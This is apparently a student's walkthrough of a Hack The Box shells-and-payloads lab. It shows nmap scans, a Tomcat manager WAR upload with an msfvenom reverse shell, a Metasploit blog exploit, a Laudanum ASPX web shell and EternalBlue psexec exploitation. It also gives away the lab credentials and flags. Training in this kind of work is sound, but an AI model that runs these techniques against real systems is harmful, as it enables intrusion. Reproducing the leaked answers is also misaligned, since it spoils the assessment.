Shells & Payloads - The Live Engagement
First thing to do is connect to Foothold using Xfreerdp
xfreerdp3 /v:ipaddress /u:username /p:passwordYou will then be connected to the foothold host
IFCONFIG
┌─[htb-student@skills-foothold]─[~]
└──╼ $ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
ether 02:42:75:cb:8f:86 txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.129.204.126 netmask 255.255.0.0 broadcast 10.129.255.255
inet6 dead:beef::250:56ff:feb0:3448 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb0:3448 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:34:48 txqueuelen 1000 (Ethernet)
RX packets 15871 bytes 1285837 (1.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9521 bytes 12710293 (12.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.1.5 netmask 255.255.254.0 broadcast 172.16.1.255
inet6 fe80::250:56ff:feb0:e56 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b0:0e:56 txqueuelen 1000 (Ethernet)
RX packets 3072 bytes 436727 (426.4 KiB)
RX errors 0 dropped 10 overruns 0 frame 0
TX packets 3054 bytes 219110 (213.9 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 42 bytes 3104 (3.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 42 bytes 3104 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌─[htb-student@skills-foothold]─[~]Now we need to begin targetting Host-01
Run an initial nmap scan for the first question to get a brief of whats going on on the host
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap -A 172.16.1.11
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-12 12:01 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.044s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer Microsoft lpd
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-12T16:02:53+00:00
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2025-04-11T15:42:55
|_Not valid after: 2025-10-11T15:42:55
|_ssl-date: 2025-04-12T16:02:58+00:00; 0s from scanner time.
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-12T09:02:53-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:4e:ae (VMware)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-04-12T16:02:53
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h24m00s, deviation: 3h07m49s, median: 0s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.78 seconds
The host name is: shells-winsvr
This is a Windows Server 2019
Lets begin with some recon on the target
We shall visit the web server first and see whats going on there if there is any upload exploits that can be exploited.
Checked if Firefox was installed because I was not seeing an installation application
Then launched web server
Seems to be an Apache Tomcat/10.0.11 Webserver running
Lets look for some exploits for this version.
So far seems to be none that could provide us with an initial access
Next i've identified something that looks pretty promising
The Manager Web_App for Tomcat it seems
It also shows where the users are defined
When I click on the manaegr_webapp, it does bring me to someone of access authentication page, but the thing is we don't know the password yet
I took the shortcut method and checked for the Hint for Host-01.
We got told that there are two vulnerabilities
The creds for potentially vulnerable process is tomcat | Tomcatadm
I will revisit how to get the credentials later
I tested this in the above Manager page that I identified previously and the credentials worked
Now Lets explore this page
Got some nice info about the server
We have some sort of Upload feature here
Now, based on the above upload feature, what exactly is a WAR file? quick GPT search and we get
So we will need a WAR Payload to upload to the Tomcat Server
But what tool can do this?
Lets check out Laudanum
Quick search on my own VM and we can identify that there is a cmd.war payload
Lets try it on the Remote Host
Boom! the Remote host also has the same thing
Lets copy this file to a better location
Lets try and upload this f***** payload
Go back to the browser and try upload it
Press Deploy and see what happens?
We see that a new application was added, so i guess the upload worked?
Lets try and browse to his directory now
Seems like this payload method doesn't work
We could try another method of creating a payload
Lets try with MSFVenom
PAYLOAD WITH MSFVENOM
Setup a listener on the Attacker machine
This will listen on port 8081 for any connections to that port
Setup MSFVENOM Payload
Set the IP Address and the PORT
Set the type of payload
We will use this payload and try upload it through the tomcat manager platform again and see if we get a shell
I tried it and realized it doesnt work, but the issue is that the payload type i set it to windows, where the platform is a apache webserver which uses JavaScript, so my bad, will change the payload type and hopefully it works this time.
BOOM, now it works, we have a shell
So we are done with HOST-01, lets move onto the next
HOST-02
Enum
Nmap Scan
┌─[htb-student@skills-foothold]─[~]
└──╼ $nmap blog.inlanefreight.local -A
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 02:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
| 256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_ 256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.75 seconds
So we know that it is an Ubuntu machine that is running
There is SSH
We can try to access it later
There is a HTTP Webserver running
We see robots.txt > Something we can explore for hidden directories
Checking out the Webserver
Seems to be a guy named Slade Wilson posting some post on the blog website
The question in HTB ask something similar to the blog post by Slade Wilson
Lets check out the post maybe we can identify an answer
The answer is: php
Basically look at the link of the exploit and read through the code and you will see the following
Now to exploit this blog website, i guess we will have to identify a way to upload this exploit, so lets have a look back at the blog.
Seems to be a login for the user Slade Wilson.. ummm interesting..
I wounder what the credentials could be....
If we check the Hints for Host-2 we get some sort of credentials for the blog, lets try and use that
admin:admin123!@#
We gain access as Slade Wilson, nice!
We can now create some blog post as Slade Wilson
Exploitation - With Metasploit
To exploit this we can use Metasploit which should have the exploit module identified by Slade Wilson.
Lets try
msfconsole -q
msf](Jobs:0 Agents:0) >> use 50064.rb
[*] Using configured payload php/meterpreter/bind_tcp
[msf](Jobs:0 Agents:0) exploit(50064) >> show options
Module options (exploit/50064):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD demo yes Blog password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identi
fier, or hosts file with syntax 'file
:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The URI of the arkei gate
USERNAME demo yes Blog username
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):Now we set the options required
set VHOST blog.inlanefreight.localWe need to identify the IP Address of the Blog Web Server
└──╼ $ping -c 1000 blog.inlanefreight.local
PING blog.inlanefreight.local (172.16.1.12) 56(84) bytes of data.
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=1 ttl=64 time=0.423 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=2 ttl=64 time=0.481 ms
64 bytes from blog.inlanefreight.local (172.16.1.12): icmp_seq=3 ttl=64 time=0.612 ms
^C
--- blog.inlanefreight.local ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2055ms
rtt min/avg/max/mdev = 0.423/0.505/0.612/0.079 msNow we set the remaining options
[msf](Jobs:0 Agents:0) exploit(50064) >> set VHOST blog.inlanefreight.local
VHOST => blog.inlanefreight.local
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOSTS 172.16.1.12
RHOSTS => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set RHOST 172.16.1.12
RHOST => 172.16.1.12
[msf](Jobs:0 Agents:0) exploit(50064) >> set USERNAME admin
USERNAME => admin
[msf](Jobs:0 Agents:0) exploit(50064) >> set PASSWORD admin123!@#
PASSWORD => admin123!@#Now lets exploit this shit... and BOOM we are in!!
HTB ANSWER: B1nD_Shells_r_cool
HOST-03
Enum
nmap scan
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #nmap -A 172.16.1.13
Starting Nmap 7.92 ( https://nmap.org ) at 2025-04-13 12:04 EDT
Nmap scan report for 172.16.1.13
Host is up (0.0034s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
MAC Address: 00:50:56:B0:6C:CC (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h19m59s, deviation: 4h02m29s, median: 0s
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:6c:cc (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: SHELLS-WINBLUE
| NetBIOS computer name: SHELLS-WINBLUE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-04-13T09:05:19-07:00
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-04-13T16:05:19
|_ start_date: 2025-04-13T15:06:06
TRACEROUTE
HOP RTT ADDRESS
1 3.43 ms 172.16.1.13Enumerating Webserver
When we visit the website, we see its just a directory listing
We see that there is an upload.aspx used for uploading aspx files, so in this case we can create an aspx payload utilizing various methods to gain a shell
Exploit
Lets try with 🧪 Laudanum – "One Web Shell to Rule Them All"
Locate Laudanum and find the right shell payload
We can copy this payload to our own directory
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #cd /usr/share/laudanum/aspx/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #ls
shell.aspx
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cp shell.aspx /home/htb-student/
┌─[root@skills-foothold]─[/usr/share/laudanum/aspx]
└──╼ #cd /home/htb-student/
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #ls
ls: cannot access 'thinclient_drives': Permission denied
core Documents Music Public Templates Videos
Desktop Downloads Pictures shell.aspx thinclient_drives
┌─[✗]─[root@skills-foothold]─[/home/htb-student]
└──╼ #
Now lets change some settings, most likely the allowed IPs, lets see
Ive added the foothold's IP Address
Now lets try and uplaod this payload and see if we can get a shell
IT WORKED!!!!
ummmmm... Its seems that access is denied when trying to change directory into the Administrator account
I did look at the hint, it mentioned Blue, so this means that his host is vulnerable to Eternal Blue.. I went into a loophole through the webserver, but still at least we got a shell through their, we woulc have maybe done it another way..
Lets test the Eternal Blue Method
┌─[root@skills-foothold]─[/home/htb-student]
└──╼ #msfconsole -q
Search the exploit
[msf](Jobs:0 Agents:0) >> search ms17
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexecWe will use the 1 options, psexec payload
Set the other options
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set RHOSTS 172.16.1.13
RHOSTS => 172.16.1.13
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >> set LHOST 172.16.1.5
LHOST => 172.16.1.5
[msf](Jobs:0 Agents:0) exploit(windows/smb/ms17_010_psexec) >>Now we can spray and pray!
BOOM WE GOT A GOOD SHELL
To answer the Final HTB Question
(Meterpreter 1)(C:\Windows\system32) > cat C:/Users/Administrator/Desktop/Skills-flag.txt
One-H0st-Down!(Meterpreter 1)(C:\Windows\system32) >Last updated